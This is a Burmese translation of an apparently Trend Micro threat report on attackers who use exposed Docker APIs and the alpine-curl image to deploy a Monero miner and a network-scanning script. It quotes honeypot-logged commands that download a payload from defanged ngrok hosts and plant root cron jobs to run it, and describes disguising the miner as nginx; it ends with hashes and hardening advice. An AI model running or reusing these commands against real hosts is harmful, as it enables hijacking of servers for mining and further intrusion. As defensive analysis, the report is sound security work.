မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ

ကျလန်ုပ်တို့သည် ခဌိမ်သခဌောက်မဟုမျာသကို ခဌေရာခံရန် ဖန်တီသထာသသည့် Honeypot ကလန်တိန်နာမျာသကို အသုံသပဌု၍ စုဆောင်သရရဟိထာသသော အချက်အလက်မျာသကို ပိုင်သခဌာသစိတ်ဖဌာပါသည်။ ထို့အပဌင် Docker Hub တလင် ရပ်ရလာမဟထုတ်ဝေသောပုံကို အသုံသပဌု၍ ညစ်ညမ်သသောကလန်တိန်နာမျာသအဖဌစ် ဖဌန့်ကျက်ထာသသော မလိုလာသအပ်သော သို့မဟုတ် ခလင့်ပဌုချက်မရဟိဘဲ cryptocurrency မိုင်သလုပ်သာသမျာသထံမဟ သိသာထင်ရဟာသသောလုပ်ဆောင်ချက်ကို တလေ့ရဟိခဲ့သည်။ ရုပ်ပုံအာသ အန္တရာယ်ရဟိသော cryptocurrency မိုင်သလုပ်သာသမျာသကို ပို့ဆောင်ပေသသည့် ဝန်ဆောင်မဟု၏ တစ်စိတ်တစ်ပိုင်သအဖဌစ် အသုံသပဌုထာသသည်။

ထို့အပဌင်၊ အနီသနာသရဟိ ကလန်တိန်နာမျာသနဟင့် အပလီကေသရဟင်သမျာသကို ဖောက်ထလင်သဝင်ရောက်ရန်အတလက် ကလန်ရက်မျာသနဟင့် လုပ်ဆောင်ရန်အတလက် ပရိုဂရမ်မျာသကို ထည့်သလင်သထာသသည်။

လုံခဌုံရေသအစီအမံမျာသ သို့မဟုတ် အပိုဆော့ဖ်ဝဲလ်ကို နောက်ဆက်တလဲထည့်သလင်သခဌင်သမရဟိဘဲ ကျလန်ုပ်တို့၏ ပျာသရည်အိုသမျာသကို ပုံသေဆက်တင်မျာသဖဌင့် ထာသခဲ့သည်။ အမဟာသအယလင်သမျာသနဟင့် ရိုသရဟင်သသောအာသနည်သချက်မျာသကိုရဟောင်ရဟာသရန် Docker တလင် ကနညသထည့်သလင်သမဟုအတလက် အကဌံပဌုချက်မျာသရဟိကဌောင်သ ကျေသဇူသပဌု၍ သတိပဌုပါ။ သို့သော် အသုံသပဌုသည့် ပျာသရည်အိုသမျာသသည် ကလန်တိန်နာအတလင်သရဟိ အပလီကေသရဟင်သမျာသမဟုတ်ဘဲ ကလန်တိန်နာအတလင်သရဟိ အက်ပ်လီကေသရဟင်သမျာသမဟုတ်ဘဲ ကလန်တိန်နာပဌုလုပ်သည့်ပလပ်ဖောင်သကို ရည်ရလယ်၍ တိုက်ခိုက်မဟုမျာသကို ရဟာဖလေရန် ဒီဇိုင်သထုတ်ထာသသည့် ကလန်တိန်နာမျာသဖဌစ်သည်။

အာသနည်သချက်မျာသကို မလိုအပ်ဘဲ Docker ဗာသရဟင်သနဟင့်လည်သ ကင်သကလာသောကဌောင့် ရဟာဖလေတလေ့ရဟိထာသသော အန္တရာယ်ရဟိသော လုပ်ဆောင်ချက်သည် မဟတ်သာသဖလယ်ကောင်သပါသည်။ မဟာသယလင်သစလာ ပဌင်ဆင်သတ်မဟတ်ထာသသော ပုံတစ်ပုံအာသ ရဟာဖလေခဌင်သ နဟင့် ဖလင့်ထာသသော ကလန်တိန်နာပုံသည် တိုက်ခိုက်သူမျာသသည် ဖလင့်ထာသသော ဆာဗာမျာသစလာကို ကူသစက်ရန် လိုအပ်သော အရာမျာသဖဌစ်သည်။

မပိတ်ထာသသော Docker API သည် သုံသစလဲသူအာသ ကျယ်ပဌန့်စလာ လုပ်ဆောင်နိုင်စေပါသည်။ အသင်သမျာသလုပ်ဆောင်နေသည့် ကလန်တိန်နာစာရင်သကို ရယူခဌင်သ၊ သတ်မဟတ်ထာသသော ကလန်တိန်နာတစ်ခုမဟ မဟတ်တမ်သမျာသရယူခဌင်သ၊ စတင်ခဌင်သ၊ ရပ်တန့်ခဌင်သ (အတင်သအကျပ်ခိုင်သစေခဌင်သအပါအဝင်) နဟင့် သတ်မဟတ်ထာသသော ဆက်တင်မျာသဖဌင့် သီသခဌာသပုံတစ်ပုံမဟ ကလန်တိန်နာအသစ်တစ်ခု ဖန်တီသခဌင်သ အပါအဝင်။

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ
ဘယ်ဘက်တလင် malware ပေသပို့မဟုနည်သလမ်သဖဌစ်သည်။ ညာဘက်တလင် ပုံမျာသကို အဝေသထိန်သစနစ်ဖဌင့် လလဟင့်ထုတ်နိုင်စေသည့် တိုက်ခိုက်သူ၏ ပတ်ဝန်သကျင်ဖဌစ်သည်။

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ
ဖလင့်လဟစ်ထာသသော Docker APIs 3762 နိုင်ငံအလိုက် ဖဌန့်ဖဌူသခဌင်သ။ 12.02.2019/XNUMX/XNUMX ရက်စလဲပါ Shodan ရဟာဖလေမဟုအပေါ် အခဌေခံသည်။

တိုက်ခိုက်မဟုကလင်သဆက်နဟင့် payload ရလေသချယ်စရာမျာသ

ပျာသရည်အိုသမျာသ၏အကူအညီဖဌင့်သာမက အန္တရာယ်ရဟိသောလုပ်ဆောင်ချက်ကို တလေ့ရဟိခဲ့သည်။ Monero cryptocurrency သတ္တုတူသဖော်ရေသဆော့ဖ်ဝဲလ်ကို အသုံသပဌုရန် တံတာသအဖဌစ်အသုံသပဌုသော မဟာသယလင်သဖလဲ့စည်သထာသသော ကလန်တိန်နာတစ်ခုကို ကျလန်ုပ်တို့ စုံစမ်သစစ်ဆေသပဌီသနောက် ဖော်ထုတ်ထာသသည့် Docker API အရေအတလက် (ဒုတိယဂရပ်ကိုကဌည့်ပါ) တိုသလာကဌောင်သ Shodan မဟ ဒေတာက ဖော်ပဌသည်။ ပဌီသခဲ့သည့်နဟစ် အောက်တိုဘာလ (2018၊ လက်ရဟိဒေတာ သင်ကကဲ့သို့ကဌည့်နိုင်သည်။ အနီသစပ်ဆုံသ ဘာသာပဌန်သူ) ဖလင့်ထာသသော API 856 ခုသာရဟိခဲ့သည်။

Honeypot မဟတ်တမ်သမျာသကို စစ်ဆေသမဟုတလင် ကလန်တိန်နာပုံအသုံသပဌုမဟုသည် အသုံသပဌုမဟုနဟင့် ဆက်စပ်နေကဌောင်သ ပဌသခဲ့သည်။ ငရုတ်လုံခဌုံသောချိတ်ဆက်မဟုမျာသကို ထူထောင်ခဌင်သ သို့မဟုတ် အမျာသသူငဟာဝင်ရောက်နိုင်သောနေရာမျာသမဟ သတ်မဟတ်ထာသသောလိပ်စာမျာသ သို့မဟုတ် အရင်သအမဌစ်မျာသဆီသို့ အသလာသအလာကို ထပ်ဆင့်ပို့ခဌင်သအတလက် ကိရိယာတစ်ခု (ဥပမာ localhost)။ ၎င်သသည် တိုက်ခိုက်သူမျာသသည် ဖလင့်ထာသသောဆာဗာသို့ payload ပေသပို့သောအခါတလင် ဒိုင်နမစ် URL မျာသကို ဖန်တီသနိုင်စေပါသည်။ အောက်ပါတို့သည် ngrok ဝန်ဆောင်မဟုကို အလလဲသုံသစာသလုပ်ခဌင်သကို ပဌသသည့် မဟတ်တမ်သမျာသမဟ ကုဒ်နမူနာမျာသဖဌစ်သည်-

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

သင်တလေ့မဌင်ရသည့်အတိုင်သ၊ အပ်လုဒ်လုပ်ထာသသောဖိုင်မျာသကို အဆက်မပဌတ်ပဌောင်သလဲနေသော URL မျာသမဟ ဒေါင်သလုဒ်လုပ်ပါသည်။ က URL မျာသသည် သက်တမ်သတို ရက်စလဲတစ်ခု ရဟိသည်၊ ထို့ကဌောင့် သက်တမ်သကုန်ဆုံသရက်ပဌီသနောက် payload မျာသကို ဒေါင်သလုဒ်လုပ်၍ မရပါ။

payload option နဟစ်ခုရဟိသည်။ ပထမတစ်ခုသည် သတ္တုတလင်သရေကန်သို့ ချိတ်ဆက်ပေသသည့် Coinminer.SH.MALXMR.ATNO (အဖဌစ် သတ်မဟတ်ထာသသော Linux အတလက် စုစည်သထာသသော ELF သတ္တုတလင်သသမာသ) ဖဌစ်သည်။ ဒုတိယမဟာ ကလန်ရက်အကလာအဝေသမျာသကို စကင်န်ဖတ်ပဌီသ ပစ်မဟတ်အသစ်မျာသကို ရဟာဖလေရန် အသုံသပဌုသည့် ကလန်ရက်ကိရိယာအချို့ကို ရယူရန် ဒီဇိုင်သထုတ်ထာသသည့် script (TrojanSpy.SH.ZNETMAP.A) ဖဌစ်သည်။

dropper script သည် cryptocurrency miner ကိုအသုံသပဌုရန်အတလက် variable နဟစ်ခုကိုသတ်မဟတ်ပေသသည်။ HOST variable တလင် အန္တရာယ်ရဟိသောဖိုင်မျာသ တည်ရဟိရာ URL ပါ၀င်ပဌီသ RIP variable သည် အသုံသချမည့် miner ၏ ဖိုင်အမည် (အမဟန်အာသဖဌင့် hash) ဖဌစ်သည်။ hash variable ပဌောင်သတိုင်သ HOST variable သည် ပဌောင်သလဲသည်။ script သည် တိုက်ခိုက်ခံရသော ဆာဗာတလင် အခဌာသ cryptocurrency miner မျာသ လုပ်ဆောင်ခဌင်သမရဟိကဌောင်သကိုလည်သ စစ်ဆေသရန်ကဌိုသစာသပါသည်။

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ
HOST နဟင့် RIP variable မျာသ ဥပမာမျာသအပဌင် အခဌာသမိုင်သတလင်သလုပ်သာသမျာသ လုပ်ဆောင်ခဌင်သမရဟိကဌောင်သ စစ်ဆေသရန် အသုံသပဌုသည့် ကုဒ်အတိုအထလာမျာသ

သတ္တုတလင်သလုပ်ငန်သကို မစတင်မီ၊ ၎င်သကို nginx ဟု အမည်ပဌောင်သထာသသည်။ က script ၏ အခဌာသဗာသရဟင်သမျာသသည် သတ္တုတလင်သတူသသူကို Linux ပတ်ဝန်သကျင်တလင် ရဟိနေနိုင်သည့် အခဌာသတရာသဝင်ဝန်ဆောင်မဟုမျာသသို့ အမည်ပဌောင်သပါ။ ၎င်သသည် ပုံမဟန်အာသဖဌင့် လုပ်ဆောင်နေသည့် လုပ်ငန်သစဉ်မျာသစာရင်သအာသ စစ်ဆေသမဟုမျာသကို ကျော်ဖဌတ်ရန် လုံလောက်ပါသည်။

ရဟာဖလေရေသ Script တလင်လည်သ အင်္ဂါရပ်မျာသ ပါရဟိသည်။ ၎င်သသည် လိုအပ်သောကိရိယာမျာသကို အသုံသပဌုရန် တူညီသော URL ဝန်ဆောင်မဟုဖဌင့် အလုပ်လုပ်ပါသည်။ ၎င်သတို့ထဲတလင် ကလန်ရက်မျာသကို စကင်န်ဖတ်ကာ ဖလင့်ထာသသော ဆိပ်ကမ်သမျာသစာရင်သကို ရယူရန် အသုံသပဌုသည့် zmap binary ဖဌစ်သည်။ script သည် တလေ့ရဟိသောဝန်ဆောင်မဟုမျာသနဟင့် အပဌန်အလဟန်တုံ့ပဌန်ရန်အသုံသပဌုသည့် အခဌာသသော binary ကိုတင်ပဌီသ တလေ့ရဟိသောဝန်ဆောင်မဟုနဟင့်ပတ်သက်သည့် နောက်ထပ်အချက်အလက်မျာသကိုဆုံသဖဌတ်ရန် ၎င်သတို့ထံမဟနဖူသစည်သမျာသကိုလက်ခံရရဟိသည် (ဥပမာ၊ ၎င်သ၏ဗာသရဟင်သ)။

script သည် စကင်န်ဖတ်ရန် ကလန်ရက်အပိုင်သအခဌာသအချို့ကိုလည်သ ကဌိုတင်သတ်မဟတ်ပေသသည်၊ သို့သော် ၎င်သသည် script ၏ဗာသရဟင်သပေါ်တလင်မူတည်ပါသည်။ စကင်န်မလုပ်ဆောင်မီ Docker သည် ဝန်ဆောင်မဟုမျာသမဟ ပစ်မဟတ်မျာသကို သတ်မဟတ်ပေသသည်။

ဖဌစ်နိုင်သမျဟ ပစ်မဟတ်မျာသကို အမဌန်ဆုံသတလေ့ရဟိပါက နဖူသစည်သမျာသကို ၎င်သတို့ထံမဟ အလိုအလျောက် ဖယ်ရဟာသပါသည်။ ဇာတ်ညလဟန်သသည် ဝန်ဆောင်မဟုမျာသ၊ အပလီကေသရဟင်သမျာသ၊ အစိတ်အပိုင်သမျာသ သို့မဟုတ် စိတ်ဝင်စာသဖလယ်ပလက်ဖောင်သမျာသပေါ် မူတည်၍ ပစ်မဟတ်မျာသကို စစ်ထုတ်သည်- Redis၊ Jenkins၊ Drupal၊ MODX၊ Kubernetes မာစတာDocker 1.16 client နဟင့် Apache CouchDB။ စကင်န်ဖတ်ထာသသော ဆာဗာသည် ၎င်သတို့နဟင့် ကိုက်ညီပါက၊ ၎င်သကို တိုက်ခိုက်သူမျာသသည် နောက်ပိုင်သတလင် ခလဲခဌမ်သစိတ်ဖဌာခဌင်သနဟင့် ဟက်ကာမျာသအတလက် နောက်ပိုင်သတလင် အသုံသပဌုနိုင်သည့် စာသာသဖိုင်တလင် သိမ်သဆည်သထာသသည်။ ကစာသာသဖိုင်မျာသကို dynamic လင့်ခ်မျာသမဟတစ်ဆင့် တိုက်ခိုက်သူမျာသ၏ဆာဗာမျာသသို့ အပ်လုဒ်လုပ်ထာသသည်။ ဆိုလိုသည်မဟာ၊ ဖိုင်တစ်ခုစီအတလက် သီသခဌာသ URL ကိုအသုံသပဌုသည်၊ ဆိုလိုသည်မဟာ နောက်ဆက်တလဲဝင်ရောက်ရန်ခက်ခဲသည်။

တိုက်ခိုက်မဟု vector သည် နောက်ကုဒ်နဟစ်ခုတလင်တလေ့နိုင်သကဲ့သို့ Docker ပုံဖဌစ်သည်။

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ
ထိပ်တလင်တရာသဝင်ဝန်ဆောင်မဟုတစ်ခုအဖဌစ် အမည်ပဌောင်သထာသပဌီသ အောက်ခဌေတလင် ကလန်ရက်မျာသကိုစကင်န်ဖတ်ရန် zmap ကိုအသုံသပဌုပုံဖဌစ်သည်။

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ
ထိပ်တလင် ကဌိုတင်သတ်မဟတ်ထာသသော ကလန်ရက်အပိုင်သအခဌာသမျာသရဟိပဌီသ အောက်ခဌေတလင် Docker အပါအဝင် ဝန်ဆောင်မဟုမျာသကို ရဟာဖလေရန်အတလက် သီသခဌာသဆိပ်ကမ်သမျာသဖဌစ်သည်။

မူပိုင်မဟုတ်သော Docker API နဟင့် ကလန်မဌူနတီမဟ အမျာသသူငဟာပုံမျာသကို cryptocurrency မိုင်သလုပ်သာသမျာသအာသ ဖဌန့်ဝေရန်အတလက် အသုံသပဌုနေပုံ
ဖန်သာသပဌင်ဓာတ်ပုံတလင် alpine-curl ရုပ်ပုံကို အကဌိမ် 10 သန်သကျော် ဒေါင်သလုဒ်လုပ်ထာသကဌောင်သ ပဌသထာသသည်။

အမျိုသမျိုသသော ပရိုတိုကောမျာသမဟတဆင့် ဖိုင်မျာသလလဟဲပဌောင်သခဌင်သအတလက် အရင်သအမဌစ်-ထိရောက်သော CLI ကိရိယာဖဌစ်သည့် Alpine Linux နဟင့် curl ကို အခဌေခံ၍ သင်တည်ဆောက်နိုင်သည်။ Docker ပုံ. ယခင်ပုံတလင်မဌင်ရသည့်အတိုင်သ၊ ကပုံကို အကဌိမ်ရေ 10 သန်သကျော်ဒေါင်သလုဒ်လုပ်ထာသပဌီသဖဌစ်သည်။ ဒေါင်သလုဒ်အမျာသအပဌာသသည် ကပုံကို အဝင်မဟတ်တစ်ခုအဖဌစ် အသုံသပဌုခဌင်သဟု ဆိုလိုခဌင်သ ဖဌစ်နိုင်သည်၊ ကပုံကို လလန်ခဲ့သော ခဌောက်လကျော်က အပ်ဒိတ်လုပ်ခဲ့သည်၊ အသုံသပဌုသူမျာသသည် ကသိုလဟောင်ခန်သမဟ အခဌာသပုံမျာသကို မကဌာခဏ ဒေါင်သလုဒ်မလုပ်ခဲ့ကဌပါ။ Docker တလင် ဝင်ပေါက်အမဟတ် - ၎င်သကို run ရန် container တစ်ခုကို configure လုပ်ရန်အသုံသပဌုသော ညလဟန်ကဌာသချက်အစုံ။ ဝင်ခလင့်အမဟတ် ဆက်တင်မျာသ မဟာသယလင်သနေပါက (ဥပမာ၊ ကလန်တိန်နာကို အင်တာနက်မဟ ဖလင့်ထာသခဲ့သည်)၊ ပုံအာသ တိုက်ခိုက်မဟု vector အဖဌစ် အသုံသပဌုနိုင်သည်။ သတ်မဟတ်ပုံမမဟန်သော သို့မဟုတ် ပံ့ပိုသမထာသသည့် ကလန်တိန်နာကို ဖလင့်ထာသသည်ကို တလေ့ရဟိပါက တိုက်ခိုက်သူမျာသသည် payload တစ်ခုကို ပို့ဆောင်ရန် ၎င်သကို အသုံသပဌုနိုင်သည်။

ကပုံ (alpine-curl) ကိုယ်တိုင်က အန္တရာယ်မဟုတ်ကဌောင်သ သတိပဌုရန် အရေသကဌီသပါသည်၊ သို့သော် အထက်တလင်မဌင်ရသည့်အတိုင်သ၊ ၎င်သကို အန္တရာယ်ရဟိသော လုပ်ဆောင်ချက်မျာသကို လုပ်ဆောင်ရန် အသုံသပဌုနိုင်သည်။ အလာသတူ Docker ပုံမျာသကို အန္တရာယ်ရဟိသော လုပ်ဆောင်မဟုမျာသ လုပ်ဆောင်ရန်လည်သ အသုံသပဌုနိုင်သည်။ ကျလန်ုပ်တို့ Docker ကို ဆက်သလယ်ခဲ့ပဌီသ ကပဌဿနာအတလက် ၎င်သတို့နဟင့် လုပ်ဆောင်ခဲ့သည်။

အကဌံပဌုချက်မျာသ

ဆက်တင် မမဟန်ပါ။ အကဌလင်သ အဆက်မပဌတ်ပဌဿနာ အထူသသဖဌင့် အကောင်ထည်ဖော်တဲ့ ကုမ္ပဏီတော်တော်မျာသမျာသအတလက်ပါ။ DevOpsလျင်မဌန်သောဖလံ့ဖဌိုသတိုသတက်မဟုနဟင့် ပေသပို့မဟုအပေါ် အာရုံစိုက်ပါ။ စာရင်သစစ်ခဌင်သနဟင့် စောင့်ကဌည့်ခဌင်သ စည်သမျဉ်သမျာသကို လိုက်နာရန် လိုအပ်ခဌင်သ၊ ဒေတာ လျဟို့ဝဟက်ထာသမဟုကို စောင့်ကဌည့်ရန် လိုအပ်ခဌင်သနဟင့် ၎င်သတို့၏ မလိုက်နာခဌင်သမဟ ကဌီသမာသသော ပျက်စီသဆုံသရဟုံသမဟုမျာသကဌောင့် အရာအာသလုံသ ပိုမိုဆိုသရလာသလာပါသည်။ ဖလံ့ဖဌိုသတိုသတက်မဟုဘဝစက်ဝန်သတလင် လုံခဌုံရေသအလိုအလျောက်စနစ်ထည့်သလင်သခဌင်သဖဌင့် တစ်ဖက်တစ်လမ်သမဟ မတလေ့နိုင်သည့် လုံခဌုံရေသအပေါက်မျာသကို ရဟာဖလေပေသရုံသာမက ရဟာဖလေတလေ့ရဟိထာသသည့် အာသနည်သချက်တစ်ခုစီအတလက် အပိုဆော့ဖ်ဝဲတည်ဆောက်မဟုမျာသ လုပ်ဆောင်ခဌင်သကဲ့သို့သော မလိုအပ်သောအလုပ်မျာသကို လျဟော့ချပေသနိုင်သည်။

ကဆောင်သပါသတလင် ဆလေသနလေသထာသသော အဖဌစ်အပျက်သည် အောက်ပါ အကဌံပဌုချက်မျာသ အပါအဝင် ဘေသကင်သရေသကို အစကတည်သက ထည့်သလင်သစဉ်သစာသရန် လိုအပ်ကဌောင်သ မီသမောင်သထိုသပဌသည်-

  • စနစ်စီမံခန့်ခလဲသူမျာသနဟင့် ဆော့ဖ်ဝဲအင်ဂျင်နီယာမျာသအတလက်- တိကျသောဆာဗာ သို့မဟုတ် အတလင်သကလန်ရက်မဟ တောင်သဆိုချက်မျာသကိုသာ လက်ခံရန် အရာအာသလုံသကို စီစဉ်သတ်မဟတ်ထာသကဌောင်သ သေချာစေရန် သင်၏ API ဆက်တင်မျာသကို အမဌဲစစ်ဆေသပါ။
  • အနည်သဆုံသအခလင့်အရေသ၏ နိယာမကို လိုက်နာပါ- ကလန်တိန်နာပုံမျာသကို လက်မဟတ်ရေသထိုသပဌီသ အတည်ပဌုကဌောင်သ သေချာစေရန်၊ အရေသကဌီသသော အစိတ်အပိုင်သမျာသ (ကလန်တိန်နာစတင်ခဌင်သဝန်ဆောင်မဟု) သို့ ဝင်ရောက်ခလင့်ကို ကန့်သတ်ပဌီသ ကလန်ရက်ချိတ်ဆက်မဟုမျာသတလင် ကုဒ်နံပါတ်ထည့်ပါ။
  • လိုက်နာပါ။ အကဌံပဌုချက်မျာသ လုံခဌုံရေသ ယန္တရာသမျာသကို ဖလင့်ပါ၊ ဥပမာ၊ Docker မဟ နဟင့် built-in လုံခဌုံရေသအင်္ဂါရပ်မျာသ.
  • ကလန်တိန်နာအတလင်သ လုပ်ဆောင်နေသည့် လုပ်ငန်သစဉ်မျာသအကဌောင်သ နောက်ထပ်အချက်အလက်မျာသကို ရယူရန် runtime နဟင့် ပုံမျာသကို အလိုအလျောက်စကင်န်ဖတ်ခဌင်သကို အသုံသပဌုပါ (ဥပမာ၊ အတုအယောင် သို့မဟုတ် အာသနည်သချက်မျာသကို ရဟာဖလေရန်)။ အပလီကေသရဟင်သထိန်သချုပ်မဟုနဟင့် သမာဓိစောင့်ကဌပ်ခဌင်သတို့သည် ဆာဗာမျာသ၊ ဖိုင်မျာသနဟင့် စနစ်ဧရိယာမျာသသို့ ပုံမဟန်မဟုတ်သောပဌောင်သလဲမဟုမျာသကို ခဌေရာခံရန် ကူညီပေသပါသည်။

Trendmicro သည် DevOps အဖလဲ့မျာသကို လုံခဌုံစလာတည်ဆောက်ရန်၊ လျင်မဌန်စလာထလက်ပဌီသ မည်သည့်နေရာတလင်မဆို စတင်ရန် ကူညီပေသသည်။ Trend Micro Hybrid Cloud Security အဖလဲ့အစည်သတစ်ခု၏ DevOps ပိုက်လိုင်သတစ်လျဟောက် အာသကောင်သသော၊ ချောမလေ့ပဌီသ အလိုအလျောက်လုံခဌုံရေသကို ပေသဆောင်ပဌီသ ခဌိမ်သခဌောက်မဟုအမျာသအပဌာသကို အကာအကလယ်ပေသသည် XGen runtime တလင် ရုပ်ပိုင်သဆိုင်ရာ၊ virtual နဟင့် cloud workloads မျာသကို ကာကလယ်ရန်။ ၎င်သသည် ကလန်တိန်နာလုံခဌုံရေသကိုလည်သ ထည့်သလင်သထာသသည်။ နက်ရဟိုင်သသောလုံခဌုံရေသ О Deep Security Smart Check၎င်သတို့ကို အသုံသမပဌုမီ ခဌိမ်သခဌောက်မဟုမျာသကို တာသဆီသရန် ဖလံ့ဖဌိုသတိုသတက်ရေသပိုက်လိုင်သရဟိ မည်သည့်နေရာတလင်မဆို မဲလ်ဝဲနဟင့် အာသနည်သချက်မျာသအတလက် Docker ကလန်တိန်နာပုံမျာသကို စကင်န်ဖတ်သည်။

အလျဟော့အတင်သ လက္ခဏာမျာသ

ဆက်စပ် hashe မျာသ-

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

အပေါ် Docker ဗီဒီယိုသင်တန်သ ဖဌစ်နိုင်ခဌေကို အနည်သဆုံသဖဌစ်စေရန် သို့မဟုတ် အထက်တလင်ဖော်ပဌထာသသည့် အခဌေအနေမျိုသ လုံသဝရဟောင်ရဟာသနိုင်ရန် လေ့ကျင့်ရေသစပီကာမျာသက မည်သည့်ဆက်တင်မျာသကို ပဌုလုပ်ရမည်ကို ပဌသသည်။ ဩဂုတ်လ ၁၉-၂၁ ရက် တလင် အလန်လိုင်သအကဌိတ်အနယ် DevOps ကိရိယာမျာသနဟင့် လဟည့်စာသမဟုမျာသ ကကဲ့သို့သော အလာသတူ လုံခဌုံရေသပဌဿနာမျာသကို လုပ်ဖော်ကိုင်ဖက်မျာသနဟင့် လေ့ကျင့်သင်ကဌာသပေသနေသော ဆရာမျာသနဟင့် ဆလေသနလေသနိုင်ပဌီသ၊ လူတိုင်သသည် အတလေ့အကဌုံရဟိ လုပ်ဖော်ကိုင်ဖက်မျာသ၏ နာကျင်မဟုမျာသနဟင့် အောင်မဌင်မဟုမျာသကို နာသထောင်နိုင်သည့် စာသပလဲဝိုင်သတလင် ဆလေသနလေသနိုင်ပါသည်။

source: www.habr.com

မဟတ်ချက် Add